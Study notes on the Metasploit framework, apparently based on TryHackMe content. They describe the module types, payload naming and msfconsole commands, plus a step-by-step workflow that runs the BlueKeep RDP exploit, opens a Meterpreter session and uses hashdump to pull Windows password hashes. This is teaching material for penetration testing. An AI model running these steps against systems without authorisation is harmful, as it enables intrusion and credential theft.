Metasploit

List of modules and categories

In Kali Linux, this can be found from the: /usr/share/metasploit-framework/modules directory.

It can be found on a Linux system with the following command:

$ sudo find / -path '*metasploit-framework*modules' 2>/dev/null 

1. Auxiliary

Any supporting module, such as scanners, crawlers and fuzzers, can be found here.

1. Encoders

Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.

1. Evasion

While encoders will encode the payload, they should not be considered a direct attempt to evade antivirus software. On the other hand, evasion modules will try that, with more or less success.

1. Exploits

A piece of code that uses a vulnerability present on the target system

1. NOPs

NOPs (No OPeration) do nothing, literally. They are represented in the Intel x86 CPU family with 0x90, following which the CPU will do nothing for one cycle. They are often used as a buffer to achieve consistent payload sizes.

1. Payloads

Exploits will leverage a vulnerability on the target system, but to achieve the desired result, we will need a payload. Examples could be; getting a shell, loading a malware or backdoor to the target system, running a command, or launching calc.exe as a proof of concept to add to the penetration test report.

There will be four different directories under payloads: adapters, singles, stagers and stages.

a) Adapters: An adapter wraps single payloads to convert them into different formats. For example, a normal single payload can be wrapped inside a Powershell adapter, which will make a single powershell command that will execute the payload.

b) Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.

c) Stagers: Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads. “Staged payloads” will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small compared to the full payload sent at once.

d) Stages: Downloaded by the stager. This will allow you to use larger sized payloads.

• Refer to the Naming conventions section below for more information

1. Post

Post modules will be useful on the final stage of the penetration testing process listed above, post-exploitation.

View sub-categories under each main module

To list all the sub-categories under each main module in a neat pattern, run the following command from the folder directory.

Eg. to view all the options provided under Exploits, simply run the following command from the /usr/share/metasploit-framework/modules/exploits directory:

/usr/share/metasploit-framework/modules/exploits$ tree -L 1 
├── aix
├── android
├── apple_ios
├── bsd
├── bsdi
├── dialup
...

Naming conventions

General naming convention

<OS>/<architecture>/<payload>

1. OS: Operating system such as Windows, Linux, etc.

2. Architecture: x64 or x86

3. Payload: reverse tcp, bind_tcp, etc.

How to identify single and staged payloads?

Metasploit has a subtle way to help you identify single (also called inline) payloads and staged payloads.

• windows/x64/shell_reverse_tcp (inline)

• windows/x64/shell/reverse_tcp (staged)

Both are reverse Windows shells. The former is an inline (or single) payload, as indicated by the underscore character (_) between the words shell and reverse. While the latter is a staged payload, as indicated by the slash character (/) between the same two words.

msfconsole

msfconsole is the main interface to the Metasploit framework.

Commands overview

1. Common shell commands

a) ls

b) ping

c) clear

d) exit

1. help

2. history

3. search

Search by CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system. The search function can be directed using keywords such as type and platform.

msf6 > search type:auxiliary telnet

1. use

Eg. windows/ssh/freeshd_authbypass module

msf6 > use exploit/windows/ssh/freesshd_authbypass

1. show

a) show options

b) show paylods

c) show targets

msf6 exploit(windows/ssh/freesshd_authbypass) > show options

Module options (exploit/windows/ssh/freesshd_authbypass):

   Name       Current Setting                    Required  Description
   ----       ---------------                    --------  -----------
   RHOSTS                                        yes       The target host(s), see https://docs.metasploit.com/docs/u
                                                           sing-metasploit/basics/using-metasploit.html
   RPORT      22                                 yes       The target port (TCP)
   
   ...

msf6 exploit(windows/ssh/freesshd_authbypass) > show payloads
...

1. set

a) set payload

b) set target

From the same windows/ssh/freeshd_authbypass module above:

# RHOSTS option required as shown from "show options" command above
msf6 exploit(windows/ssh/freesshd_authbypass) > set rhosts 10.10.10.22

msf6 exploit(windows/ssh/freesshd_authbypass) > show options

Module options (exploit/windows/ssh/freesshd_authbypass):

   Name       Current Setting                    Required  Description
   ----       ---------------                    --------  -----------
   RHOSTS     10.10.10.22                        yes       The target host(s), see https://docs.metasploit.com/docs/u
                                                           sing-metasploit/basics/using-metasploit.html
   RPORT      22                                 yes       The target port (TCP)
   
   ...
   
msf6 exploit(windows/ssh/freesshd_authbypass) > show payloads
...
msf6 exploit(windows/ssh/freesshd_authbypass) > set payload <index_or_name_of_payload>

Use the unset command to remove option values:

msf6 exploit(windows/ssh/freesshd_authbypass) > unset rhosts
msf6 exploit(windows/ssh/freesshd_authbypass) > unset all # remove all options

1. info

msf6 > info exploit/windows/ssh/freesshd_authbypass
...

# OR from within the module
msf6 exploit(windows/ssh/freesshd_authbypass) > info
       Name: Freesshd Authentication Bypass
     Module: exploit/windows/ssh/freesshd_authbypass
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-08-11

...

Global option values

Use the setg and unsetg options.

1. exploit/run/check

-z flag to the exploit command will run the exploit and background the session as soon as it opens

The exploit and run command can be executed from the module after all relevant module parameters/options have been set with the set command (see above). The exploit and run command does the same thing.

msf6 exploit(windows/ssh/freesshd_authbypass) > exploit

Some modules supports the check command. This command will check if the target system is vulnerable without exploiting it.

1. background

The background command can be used to background the session prompt and go back to the msfconsole prompt.

1. sessions

The sessions command can be used from the msfconsole prompt or any context to see the existing sessions.

msf6 exploit(windows/ssh/freesshd_authbypass) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1   ...   ...                      ...                           ...

The sessions -i command can be used to interact with a session:

msf6 > session 
Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1   ...   ...                      ...                           ...

msf6 > session -i 1

1. back

msf6 exploit(windows/ssh/freesshd_authbypass) > back
msf6 > 

Typical workflow

1. Identify service that is running

Eg. RDP service on port 3389

$ sudo nmap ...

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
...

1. Search (search command) for auxiliary module (eg. scanner) and select using the use command

msf6 > search type:auxiliary scanner/rdp
0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep  2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
...

msf6 > use 0

1. View information about the module using the info or show options command: identify required parameters and set the values: rhosts, etc.

msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > info
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts ...
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set ...

1. Run auxiliary module to discover if target system is vulnerable (run/exploit command)

Suppose the system is vulnerable to the particular vulnerability

msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
... SYSTEM IS VULNERABLE TO ... bluekeep ....

1. Search (search command) for related exploit and select using the use command

msf6 > search type:exploit bluekeep
 0  exploit/windows/rdp/cve_2019_0708_bluekeep_rce    2019-05-14 ...
 
msf6 > use 0

1. Read information about the exploit using the infoorshow options command: identify required parameters and set the values

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts ...
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set ...

1. Search for payload, read information about it, and set the payload

Alternatively, use the default payload selected

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > search payloads
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload 0 # eg. payload index 0

1. View the targets and select the relevant one

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target ...

1. Run exploit

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit

1. Gain Meterpreter

meterpreter > pwd
meterpreter > ls 
meterpreter > shell
...

Meterpreter

Useful commands:

1. help

• Displays the help menu

1. background

• Sends the current Meterpreter session into the background, and returns to the msf prompt

• Use the session -i command to get back to the Meterpreter session

1. cat, cd, pwd, ls

• Similar to the Linux command line

1. hashdump

• Dumps the contents of the SAM database

• The Security Accounts Manager (SAM) is a database file in Windows that contains usernames and passwords

1. shell

• Presents a standard shell on the target system

Metasploit Unleashed - Free Online Ethical Hacking Course | OffSecOffSec

Content and knowledge from TryHackMe:

MetasploitTryHackMe